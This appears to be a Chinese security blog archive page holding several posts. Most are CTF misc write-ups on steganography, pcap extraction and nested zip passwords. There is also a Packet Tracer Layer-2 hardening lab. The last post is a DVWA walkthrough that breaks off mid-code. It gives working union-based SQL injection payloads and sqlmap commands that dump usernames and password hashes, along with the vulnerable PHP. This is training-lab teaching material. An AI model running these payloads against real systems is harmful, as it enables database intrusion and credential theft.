数据库 on 知识带给我们自由

BUUCTF 派大星的烦恼 1

Sat, 31 May 2025 11:44:09 +0000

题目描述：

派大星最近很苦恼，因为它的屁股上出现了一道疤痕！我们拍下了它屁股一张16位位图，0x22，0x44代表伤疤两种细胞，0xf0则是派大星的赘肉。还原伤疤，知道是谁打的派大星！(答案为32位的一串字符串) 注意：得到的 flag 请包上 flag{} 提交

密文：

下载附件，解压得到派大星的烦恼.bmp

解题思路：

1、用010Editor打开bmp文件，搜索 0x22、0x44 两种伤疤细胞。

只有两种格式，可以尝试转换为二进制数据。

1

"DD"DD""""D"DD""""""DD"""DD"DD""D""DDD""D"D"DD""""""DD""D""""DD"D"D"DD""""D"DD""D"""DD"""""DDD""""D"DD"""D"""DD"""D""DD"D"D"DD"""DD""DD"D"D""DD""DD"DD"""D"""DD""DD"DD""D"D""DD"D"D"DD"""D"""DD"""D"DD""DD"""DD"D"D""DD"""D"DD""DD""DD"""""DDD""DD""DD"""D""DD""

2、将 " 对应0、 D 对应1，转换为

1

0110110000101100000011000110110010011100101011000000110010000110101011000010110010001100000111000010110001000110001001101010110001100110101001100110110001000110011011001010011010101100010001100010110011000110101001100010110011001100000111001100110001001100

将二进制数据转换为ASCII文字，转换出一堆乱码，尝试逆序反转二进制数据再转ASCII文字。 ASCII，十六进制，二进制，十进制，Base64转换器

逆序反转数据：文本逆序翻转工具

1

0011001000110011001110000011001100110100011001010110001100110100011000100011010101100101001101100110001000110110011001010110011000110101011001000110001000110100001110000011000100110100001101010110000100110000001101010011100100110110001100000011010000110110

成功转换为ASCII： 23834ec4b5e6b6ef5db48145a0596046 。

3、用得到的ASCII文本提交flag(答案为32位的一串字符串) ，失败了。再将得到的ASCII文本进行逆序反转，得到flag： 6406950a54184bd5fe6b6e5b4ce43832 。

最后，贴个网上的脚本：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


with open("E:\Download\misc\派大星的烦恼.bmp","rb") as fr:
    res = fr.read()[4000:4256]
    tmp = []
    for v in res:
        if v == 34:
            tmp.append(0)
        else:
            tmp.append(1)
    fr.close()
for i in range(len(tmp)):
    tmp[i] = str(tmp[i])
a = "".join(tmp)
print(a)
b = []
for i in range(0,len(a),8):
    t = a[i:i+8]
    t = t[::-1]
    b.append(int(t,2))
w = ""
for v in b:
    w+=str(hex(v))[2:]
print(w)

flag：

1

flag{6406950a54184bd5fe6b6e5b4ce43832}

BUUCTF 蜘蛛侠呀 1

Mon, 27 Jan 2025 09:17:18 +0000

BUUCTF: https://buuoj.cn/challenges

题目描述：

将你获得的明显信息md5加密之后以flag{xxx}的格式提交。注意：得到的 flag 请包上 flag{} 提交

密文：

下载附件，解压得到out.pcap

解题思路：

1、打开out.pcap，发现大量ICMP报文，携带以 $$START$$ 开头的数据，似乎是Base64数据。

使用Python脚本，提取数据。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32


import pyshark
import binascii

# 打开PCAP文件并设置过滤器
packets = pyshark.FileCapture('out.pcap', display_filter="icmp.type==0")

res = []

# 处理每个数据包
for each in packets:
    try:
        # 解码ICMP数据负载
        data = binascii.unhexlify(each.icmp.data).decode()
        
        # 去除头部的 $$START$$
        if data.startswith('$$START$$'):
            data = data[len('$$START$$'):]
        
        # 去除重复项
        if data not in res:
            res.append(data)
    except Exception as e:
        print(f"Error processing packet: {e}")

# 将结果写入文件
with open('out.txt', 'w') as f:
    f.write(''.join(res))

# 关闭数据包读取器
packets.close()

print('done')

得到的数据，删除头部和尾部的标识，复制到在线网站进行Base64解码。

Base64 在线解码、编码

解码后的数据提示是一个zip文件，另存为zip。

2、解压zip文件，得到flag.gif

观察该GIF，发现播放非常缓慢，猜测帧间隔存在隐写数据。这似乎是 时间隐写 。

使用Kali下的identify工具提取数据，命令如下：

1

identify -format '%T' flag.gif

1

2050502050502050205020202050202020205050205020502050205050505050202050502020205020505050205020206666

得到的数据由 20 和 50 组成，猜想二进制。将 20 替换为 0 ， 50 替换为 1 ，去掉尾部的 6666 。

1

011011010100010000110101010111110011000101110100

将二进制数据转换为ASCII，得到

2进制到ASCII字符串在线转换工具

1

mD5_1t

将 mD5_1t 进行md5加密，得到flag： f0f1003afe4ae8ce4aa8e8487a8ab3b6 。

MD5加解密工具

在Kali中使用tshark也可以提取数据，只需要将十六进制数据转换为字符即可。

1

tshark -r out.pcap -T fields -e data > data.txt

Python脚本如下：

1
2
3
4
5
6


import binascii

with open('data1.txt','r') as file:
    with open('data2.txt','wb') as data:
        for i in file.readlines():
            data.write(binascii.unhexlify(i[:-1]))

flag：

1

flag{f0f1003afe4ae8ce4aa8e8487a8ab3b6}

$$ \min (\text{Difficulty}{\text{User}}) = \min \left( \sum{i=1}^{n} (\text{Query}_i - \text{Answer}_i)^2 \right) $$

Packet Tracer - Layer 2 Security（第二层安全配置任务）

Thu, 23 Jan 2025 12:48:13 +0000

PacketTracer - 第二层安全配置任务

目标

确保将中心交换机（3560型号）设置为根桥。
保护生成树协议参数以防止对STP的操控攻击。
启用端口安全功能以防止CAM表溢出攻击。

背景/场景

最近网络遭受了一系列攻击。因此，网络管理员已指派您负责配置第二层安全措施。

为了确保网络性能和安全性达到最优状态，管理员希望确定中心3560型号交换机作为根桥。为防止对生成树协议进行篡改攻击，管理员希望确保STP参数得到安全配置。针对CAM表溢出攻击的风险，网络管理员决定配置端口安全策略，限制每个交换机端口学习到的MAC地址数量。一旦学习到的MAC地址超过设定的限制，管理员希望建立机制自动关闭该端口。

所有交换机设备已经预先配置了以下信息：

启用密码： ciscoenpa55
控制台密码： ciscoconpa55
SSH用户名及密码： SSHadmin / ciscosshpa55

第一部分：配置根桥

步骤1：确定当前的根桥。

从中心交换机（Central）发出 show spanning-tree 命令，以确定当前的根桥、查看正在使用的端口及其状态。

Central#show spanning-tree

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


VLAN0001
  Spanning tree enabled protocol ieee
  Root ID    Priority    32769
             Address     0009.7C61.9058
             Cost        4
             Port        25(GigabitEthernet0/1)
             Hello Time  2 sec  Max Age 20 sec  Forward Delay 15 sec

  Bridge ID  Priority    32769  (priority 32768 sys-id-ext 1)
             Address     00D0.D31C.634C
             Hello Time  2 sec  Max Age 20 sec  Forward Delay 15 sec
             Aging Time  20

Interface        Role Sts Cost      Prio.Nbr Type
---------------- ---- --- --------- -------- --------------------------------
Gi0/2            Desg FWD 4         128.26   P2p
Gi0/1            Root FWD 4         128.25   P2p
Fa0/1            Desg FWD 19        128.1    P2p

哪个交换机是当前的根桥？

基于当前的根桥，请绘制由此得出的生成树拓扑结构。

步骤2：将Central设置为主根桥。

使用命令 spanning-tree vlan 1 root primary ，将 Central 设置为根桥。

Central(config)#spanning-tree vlan 1 root primary

步骤3：将SW-1设置为备用根桥。

使用命令 spanning-tree vlan 1 root secondary ，将 SW-1 设置为备用根桥。

SW-1(config)#spanning-tree vlan 1 root secondary

步骤4：验证生成树配置。

发出 show spanning-tree 命令来验证Central已成为根桥。

在Central#提示符下执行了该命令后显示如下信息：

1
2
3
4
5
6


VLAN0001
   Spanning tree enabled protocol ieee
   Root ID  Priority      24577
            Address       00D0.D31C.634C
          -->>  This bridge is the root  <<--
            Hello Time  2 sec  Max Age  20 sec   Forward Delay  15 sec

根据上述信息，哪个交换机是当前的根桥？

基于新的根桥设置，请绘制由此得出的生成树拓扑结构。

第二部分：防止STP攻击

步骤1：在所有接入端口上启用PortFast。

PortFast应在连接至单个工作站或服务器的接入端口上配置，以使它们更快地进入活动状态。在SW-A和SW-B的相连接入端口上使用 spanning-tree portfast 命令来启用 PortFast 。

SW-A(config)#int range f0/1-4 SW-A(config-if-range)#spanning-tree portfast

SW-B(config)#int range f0/1-4 SW-B(config-if-range)#spanning-tree portfast

步骤2：在所有接入端口上启用BPDU防护。

BPDU guard是一项功能，可以有助于防止恶意交换机和在接入端口上的欺骗行为。在SW-A和SW-B的接入端口上启用BPDU防护。

注解：为了防止STP报文（BPDU）操纵攻击，在接口配置模式下可以对每个单独端口使用命令 spanning-tree bpduguard enable 来启用BPDU防护；或者在全局配置模式下使用命令 spanning-tree portfast bpduguard default 来默认为所有启用PortFast的端口启用BPDU防护。针对本活动评分目的，请使用 spanning-tree bpduguard enable 命令。

SW-A(config)#int range f0/1-4 SW-A(config-if-range)#spanning-tree bpduguard enable

SW-B(config)#int range f0/1-4 SW-B(config-if-range)#spanning-tree bpduguard enable

步骤3：启用根保护。

根保护可以在非根端口的所有交换机端口上启用，最好部署在连接到其他非根交换机的端口上。使用 show spanning-tree 命令确定每个交换机上根端口的位置。

在SW-1上，在端口F0/23和F0/24上启用根保护。同样，在SW-2上，在端口F0/23和F0/24上也启用根保护。

SW-1(config)#int range f0/23-24 SW-1(config-if-range)#spanning-tree guard root

SW-2(config)#int range f0/23-24 SW-2(config-if-range)#spanning-tree guard root

第三部分：配置端口安全并禁用未使用端口

步骤1：在连接到主机设备的所有端口上配置基本端口安全。

此操作应在SW-A和SW-B的所有接入端口上执行。设置允许学习的MAC地址最大数量为 2 ，允许动态学习MAC地址，并将违规处理方式设为 shutdown （关闭）。

注解：只有当交换机端口配置为接入模式时，才能启用端口安全功能。

SW-A(config)#interface range f0/1 - 22 SW-A(config-if-range)#switchport mode access SW-A(config-if-range)#switchport port-security SW-A(config-if-range)#switchport port-security maximum 2 SW-A(config-if-range)#switchport port-security violation shutdown SW-A(config-if-range)#switchport port-security mac-address sticky

SW-B(config)#interface range f0/1-22 SW-B(config-if-range)#switchport mode access SW-B(config-if-range)#switchport port-security max SW-B(config-if-range)#switchport port-security maximum 2 SW-B(config-if-range)#switchport port-security violation shutdown SW-B(config-if-range)#switchport port-security mac-address sticky

为什么与其它交换机设备相连的端口不启用端口安全？

步骤2：验证端口安全配置。

a. 在SW-A上，输入命令 show port-security interface f0/1 来确认已成功配置了端口安全。

SW-A#show port-security int f0/1 Port Security : Enabled Port Status : Secure-up Violation Mode : Shutdown Aging Time : 0 mins Aging Type : Absolute SecureStatic Address Aging : Disabled Maximum MAC Addresses : 2 Total MAC Addresses : 0 Configured MAC Addresses : 0 Sticky MAC Addresses : 0 Last Source Address:Vlan : 0000.0000.0000:0 Security Violation Count : 0

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


SW-A# show port-security interface f0/1
端口安全              : 已启用
端口状态                : 安全且已启动
违规模式             : 关闭端口
老化时间                 : 0分钟
老化类型                 : 绝对时间
静态安全MAC地址老化: 禁用
最大MAC地址数      : 2
总MAC地址数        : 0
已配置MAC地址数   : 0
粘性MAC地址数       : 0
最近源地址:VLAN   : 0000.0000.0000:0
安全违规计数         : 0

b. 从C1向C2发送Ping请求，然后再次输入 show port-security interface f0/1 命令，以验证交换机是否已学会C1的MAC地址。

步骤3：禁用未使用的端口。

禁用当前所有未使用的端口。

SW-A(config)#int range f0/5-22 SW-A(config-if-range)#shutdown

SW-B(config)#int range f0/5-22 SW-B(config-if-range)#shutdown

步骤4：检查结果。

您的完成度应为100%。点击“检查结果”查看反馈信息以及所需组件完成情况的验证。

实验脚本：

Central:

1
2


! 使Central成为Vlan1的根桥
spanning-tree vlan 1 root primary

SW-1:

1
2
3
4
5
6


! 使SW-1成为Vlan1的次根桥
spanning-tree vlan 1 root secondary
! 进入f0/23-f0/24端口
interface range fastEthernet 0/23 - fastEthernet 0/24
! 启用STP根防护功能，在此端口不接受拥有更优BID的BPDU报文
spanning-tree guard root 

SW-2:

1
2
3
4


! 进入f0/23-f0/24端口
interface range fastEthernet 0/23 - fastEthernet 0/24
! 启用STP根防护功能，在此端口不接受拥有更优BID的BPDU报文
spanning-tree guard root 

SW-A:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


! 选择接入的端口，F0/1-F0/4
interface range fastEthernet 0/1 - fastEthernet 0/4
! 让F0/1-F0/4端口开启portfast（不参与生成树）
spanning-tree portfast 
! 为他们启用BPDU防护功能，在此端口不接受BPDU；收到BPDU，端口禁用
spanning-tree bpduguard enable 
! 开启access模式
switchport mode access
! 开启端口安全
switchport port-security 
! 设置最大Mac学习数为2
switchport port-security maximum 2
! 设置学习到的Mac地址将被保存
switchport port-security mac-address sticky 
! 设置超过措施：关闭端口
switchport port-security violation shutdown 
! 进入不使用的端口
interface range fastEthernet 0/5 - fastEthernet 0/22
! 关闭
shutdown

SW-B:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


! 选择接入的端口，F0/1-F0/4
interface range fastEthernet 0/1 - fastEthernet 0/4
! 让F0/1-F0/4端口开启portfast（不参与生成树）
spanning-tree portfast 
! 为他们开启BPDU
spanning-tree bpduguard enable 
! 开启access模式
switchport mode access
! 开启端口安全
switchport port-security 
! 设置最大Mac学习数为2
switchport port-security maximum 2
! 设置学习到的Mac地址将被保存
switchport port-security mac-address sticky 
! 设置超过措施：关闭端口
switchport port-security violation shutdown 
! 进入不使用的端口
interface range fastEthernet 0/5 - fastEthernet 0/22
! 关闭
shutdown

BUUCTF [ACTF新生赛2020]剑龙 1

Mon, 13 Jan 2025 08:30:00 +0000

BUUCTF: https://buuoj.cn/challenges

题目描述：

得到的 flag 请包上 flag{} 提交。

密文：

下载附件，解压得到

解题思路：

1、先看一下hint.zip压缩包，解压得到

pwd.txt内容如下：

ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻ // ´∇｀ / [‘ ’]; o=(ﾟｰﾟ) = =3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (oo)/ (oo);(ﾟДﾟ)={ﾟΘﾟ: ‘ ’ ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +’ ’) [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ ‘ ‘)[o^_o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +’ ’)[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ 3) +‘ ‘) [c^_o];(ﾟДﾟ) [‘c’] = ((ﾟДﾟ)+’ ’) [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) [‘o’] = ((ﾟДﾟ)+‘ ‘) [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) [‘c’]+(ﾟДﾟ) [‘o’]+(ﾟωﾟﾉ +’ ’)[ﾟΘﾟ]+ ((ﾟωﾟﾉ 3) +’ ‘) [ﾟｰﾟ] + ((ﾟДﾟ) +’ ‘) [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ 3) +‘’) [ﾟΘﾟ]+((ﾟｰﾟ 3) +’ ‘) [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) [‘c’]+((ﾟДﾟ)+’ ‘) [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) [‘o’]+((ﾟｰﾟ 3) +‘ ‘) [ﾟΘﾟ];(ﾟДﾟ) [’ ’] =(oo) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ 3) +’ ‘) [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+’ ‘) [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ 3) +‘’) [oo -ﾟΘﾟ]+((ﾟｰﾟ 3) +’ ‘) [ﾟΘﾟ]+ (ﾟωﾟﾉ +’ ‘) [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]=’\‘; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[oo -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +’ *‘)[co];(ﾟДﾟ) [ﾟoﾟ]=’"‘;(ﾟДﾟ) [’* ‘] ( (ﾟДﾟ) [’ ‘] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((oo) +(oo))+ ((ﾟｰﾟ) + (oo))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (oo)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (oo))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((oo) +(oo))+ (oo)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) (’ ‘);

确认为aaEncode编码，使用在线工具解得 welcom3!

在线工具：https://toolwa.com/aaencode/

2、剩下一张图片，再加上一个密码，确认使用steghide工具加密。

steghide下载地址： https://sourceforge.net/projects/steghide/

使用如下命令，得到隐藏信息。

1

steghide extract -sf hh.jpg -p welcom3!

在hh.jpg的属性找到密钥： @#$%^&%%$)

解得如下信息：

1

think about stegosaurus

DES加解密： https://www.sojson.com/encrypt_des.html

3、搜索发现对应题目“剑龙”，但其实指的是stegosaurus pyc隐写工具。

O_O文件的确是一个pyc文件。

stegosaurus下载地址： https://github.com/AngelKitty/stegosaurus

运行脚本加上 -x 参数，得到flag： flag{3teg0Sauru3_!1}

flag：

1

 flag{3teg0Sauru3_!1}

BUUCTF [MRCTF2020]千层套路 1

Mon, 09 Dec 2024 08:30:00 +0000

BUUCTF: https://buuoj.cn/challenges

相关阅读 CTF Wiki Hello CTF NewStar CTF

题目描述：

得到的 flag 请包上 flag{} 提交。感谢天璇战队供题。

密文：

下载附件，得到attachment.zip文件

解题思路：

1、解压attachment.zip文件，得到0573.zip文件，向下解压需要密码。

用Bandizip打开attachment.zip文件，看到压缩包备注，密码均为四位数字

我开始使用Ziperello爆破0573.zip，得到密码0573。

使用密码向下解压压缩包，得到0114.zip。至此，我明白每个压缩包的解压密码就是它的文件名，并且向下可能有1000层压缩。（从题目千层套路推测出）

2、编写python脚本，进行自动解压（使用该脚本你可能需要删掉一批解压出的文件，再继续解压）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40


# @Author：YueXuan
# @Date  ：2024/9/24 17:19

import zipfile
import os

def extract_zip_with_filename_as_password(zip_path):
    # 检查文件是否存在
    if not os.path.exists(zip_path):
        print(f"File {zip_path} does not exist.")
        return

    # 获取ZIP文件名（不包含路径）
    zip_filename = os.path.basename(zip_path)

    # 获取不带扩展名的文件名
    base_name = os.path.splitext(zip_filename)[0]

    # 尝试使用文件名作为密码解压ZIP文件
    try:
        with zipfile.ZipFile(zip_path, 'r') as zip_ref:
            zip_ref.extractall(pwd=base_name.encode())
            print(f"Successfully extracted {zip_path} with password: {base_name}")

            # 检查解压后的文件是否还是ZIP文件
            for file in zip_ref.namelist():
                new_zip_path = os.path.join(os.getcwd(), file)
                if zipfile.is_zipfile(new_zip_path):
                    # 如果是ZIP文件，则递归调用函数继续解压
                    extract_zip_with_filename_as_password(new_zip_path)
                else:
                    print(f"Extracted file {file} is not a ZIP file.")

    except RuntimeError as e:
        print(f"Failed to extract {zip_path}: {e}")

# 使用示例
# 假设你的ZIP文件位于当前目录下，名称为0573.zip
zip_path = "0573.zip"
extract_zip_with_filename_as_password(zip_path)

最后得到qr.txt文件，打开如下所示

3、猜测为一系列的RGB颜色值，比如 (255, 255, 255)，这表示白色。编写脚本，绘制出这些数据所要表现的图像。脚本如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39


# @Author：YueXuan
# @Date  ：2024/9/24 17:29
from PIL import Image

def parse_rgb(rgb_str):
    # 去除括号并将字符串分割为列表
    rgb_values = [int(value.strip()) for value in rgb_str.strip().replace('(', '').replace(')', '').split(',')]
    return tuple(rgb_values)

def create_image_from_txt(file_path, output_path):
    # 打开文件并读取所有行
    with open(file_path, 'r') as file:
        lines = file.readlines()

    # 解析每一行的RGB值
    pixels = [parse_rgb(line) for line in lines]

    # 计算图像的宽度和高度
    width = int(len(pixels) ** 0.5)
    height = width

    # 创建一个新图像
    image = Image.new('RGB', (width, height))

    # 将像素放入图像中
    for row in range(height):
        for col in range(width):
            index = row * width + col
            if index < len(pixels):
                image.putpixel((col, row), pixels[index])

    # 保存图像
    image.save(output_path)
    print(f"Image saved to {output_path}")

if __name__ == "__main__":
    input_file = "qr.txt"
    output_file = "output_image.png"
    create_image_from_txt(input_file, output_file)

得到一个二维码图像，使用QR Research扫码，得到flag

flag：

1

flag{ta01uyout1nreet1n0usandtimes}

网络安全 DVWA通关指南 SQL Injection(SQL注入)

Fri, 20 Sep 2024 12:25:03 +0000

DVWASQLInjection

参考文献

WEB 安全靶场通关指南

SQL注入漏洞基本原理

Web应用程序对用户输入的数据校验处理不严或者根本没有校验，致使用户可以拼接执行SQL命令。

可能导致数据泄露或数据破坏，缺乏可审计性，甚至导致完全接管主机。

根据注入技术分类有以下五种：

布尔型盲注：根据返回页面判断条件真假

时间型盲注：用页面返回时间是否增加判断是否存在注入

基于错误的注入：页面会返回错误信息

联合查询注入：可以使用union的情况下

堆查询注入：可以同时执行多条语句

防御方法

使用参数化查询。

数据库服务器不会把参数的内容当作 SQL 指令的一部分来拼接执行；

而是在数据库完成 SQL 指令的编译后才套用参数运行(预编译)。

避免数据变成代码被执行，时刻分清代码和数据的界限。

Low

一、判断提交方式

在User ID中输入数字1，提交后发现，在URL地址栏出现了提交的参数，由此可以判断提交方式为get方式。

提问：get和post提交方式对SQL注入的实施有什么影响？

二、判断服务器处理类型（数字型或字符型）

加单引号，提交 1' ，出现报错信息，显示多出一个单引号，可以确定为字符型注入

三、判断注入点

提交 1' or 1=1# 语句，结果返回了全部的内容，可以判断存在注入点

1

1' or 1=1#

四、判断列数

使用 order by 语句判断目标数据库表中的列数，依次提交 1' order by 1# 语句，数字从大到小，当出现报错信息后确定列数。

1
2
3


1' order by 1#
1' order by 2#
1' order by 3# 

当提交 1' order by 3# 时出现报错信息，说明目标数据库表中的列数为2

五、提取库名、表名、字段名、值

1、提取库名

依据前一步得到的列数构建注入语句，得到数据库名dvwa

1

1' union select 1,database()#

2、提取表名

通过注入攻击来获取名为’dvwa’的数据库中的所有表名

1
2
3
4


1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#

//information_schema 是一个特殊的系统数据库，其中包含了所有用户创建的数据库以及这些数据库中的表的信息。tables 表提供了关于所有表的详细信息，如表名、表类型等。
//"1,table_name"中的'1'是一个占位符，用于模拟与原始查询返回相同数量的列，以便UNION操作成功执行。

当提交注入语句时，可能出现如下错误信息：

1

Illegal mix of collations for operation 'UNION'

这是由于MySQL在执行 UNION 操作时遇到的不同字符集之间的冲突报错。

解决方法：打开CMD，登录MySQL的dvwa数据库，修改first_name和last_name字段的字符集

1
2
3


alter table users modify first_name varchar(15) character set utf8 collate utf8_general_ci;
alter table users modify last_name varchar(15) character set utf8 collate utf8_general_ci;
//将first_name和last_name字段的字符集都设置为了utf8，并指定了排序规则为utf8_general_ci

修改完毕后，命令执行成功

3、提取字段名

通过注入攻击获取数据库中特定表（本例中为 users 表）的所有字段名。

1

1' union select 1,column_name from information_schema.columns where table_name='users'#

4、提取值

从数据库表 users 中提取 user 和 password 字段的数据

1

1' union select user,password from users#

执行命令出现同样的字符编码问题，解决方法还是修改字段的字符集

1
2


alter table users modify user varchar(15) character set utf8 collate utf8_general_ci;
alter table users modify password varchar(50) character set utf8 collate utf8_general_ci;

执行成功得到用户和密码的数据，密码为32位小写MD5，可以通过在线工具解密

六、SQLmap工具使用

1

sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=265uqla8dabr5jt04llgsk4sc9; security=low"

1、提取库名

1

sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=265uqla8dabr5jt04llgsk4sc9; security=low" --dbs

2、提取表名

1

sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=265uqla8dabr5jt04llgsk4sc9; security=low" -D dvwa --tables

3、提取字段名

1

sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=265uqla8dabr5jt04llgsk4sc9; security=low" -D dvwa -T users --columns

4、提取值

1

sqlmap -u "http://dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=i0ssj777jur6gqb9af6bd111tn; security=low" --batch -D dvwa -T users -C user,password --dump

七、分析后台脚本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24



if( isset( $_REQUEST[ 'Submit' ] ) ) {
	// Get input
	$id = $_REQUEST[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
	}

	mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28



// 检查是否有"Submit"按钮被点击
if( isset( $_REQUEST[ 'Submit' ] ) ) {
        // 获取用户输入的ID
        $id = $_REQUEST[ 'id' ];

        // 构建SQL查询语句
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
        // 执行SQL查询
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );
    
        // 处理查询结果
        while( $row = mysqli_fetch_assoc( $result ) ) {
                // 获取查询结果中的名字和姓氏
                $first = $row["first_name"];
                $last  = $row["last_name"];
    
                // 拼接输出结果
                $html .= "ID: {$id}
First name: {$first}
Surname: {$last}";
        }
    
        // 关闭数据库连接
        mysqli_close($GLOBALS["___mysqli_ston"]);

}

?>

Medium

1、修改电脑代理服务器IP设置为127.0.0.1，端口设置为8888，Bur调整代理参数与电脑代理一致

2、在DVWA中尝试提交一个ID，在BurpSuite的repeater中查看捕获到的提交信息。使用BurpSuite的repeater模块可以重复发送数据，查看返回数据。

3、确认列数

1
2
3


4 order by 1#
4 order by 2#
4 order by 3#

4、库、表、字段、值

1
2
3
4
5
6
7
8


4 union select 1,database()#
//得到库名
4 union select 1,table_name from information_schema.tables where table_schema=0x64767761#
//得到表名
4 union select 1,column_name from information_schema.columns where table_schema=0x64767761 and table_name=0x7573657273#
//得到字段
4 union select user,password from users#
//得到值

提取库名

1

4 union select 1,database()#

提取表名

注入语句发现单引号被转义，使用BurpSuite的Decoder模块，将 'dvwa' 转为16进制，自行添加 0x

1
2


4 union select 1,table_name from information_schema.tables where table_schema='dvwa'#
4 union select 1,table_name from information_schema.tables where table_schema=0x64767761#

提取字段名

1

4 union select 1,column_name from information_schema.columns where table_schema=0x64767761 and table_name=0x7573657273#

提取user、password的值

1

4 union select user,password from users#

SQLmap工具使用

将第一步抓到的数据保存在桌面，命名为1.txt文件

使用 -r 参数指定文件路径。

1
2


sqlmap -r C:\Users\yuexuan\Desktop\1.txt  --cookie "PHPSESSID=ef4ln5lm529kdmhri3meltn9lk; security=medium" --batch --dbs
// -r REQUESTFILE      从文件中读取 HTTP 请求

操作步骤与前面一致，最后得到user、password数据

1

sqlmap -r C:\Users\yuexuan\Desktop\1.txt  --cookie "PHPSESSID=ef4ln5lm529kdmhri3meltn9lk; security=medium" --batch -D dvwa -T users -C user,password --dump

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33


php

if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];

	$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
    //ysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。
    //在以下字符前添加反斜线：\x00、\n、\r、\、'、" 和 \x1a.

	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '' . mysqli_error($GLOBALS["___mysqli_ston"]) . '' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Display values
		$first = $row["first_name"];
